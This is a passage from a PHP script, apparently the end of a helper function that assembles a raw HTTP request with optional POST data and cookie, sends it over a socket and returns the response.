$packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
$packet .= "Host: $host\r\n";
$packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";
$packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
$packet .= $cookie?"Cookie: $cookie\r\n":"";
$packet .= "Connection: Close\r\n\r\n";
$packet .= $data?$data:"";
$fp = fsockopen(gethostbyname($host), 80);
if (!$fp) {
echo 'No response from '.$host; die;
}
fputs($fp, $packet);
$resp = '';
while ($fp && !feof($fp))
$resp .= fread($fp, 1024);
return $resp;
}
?> 
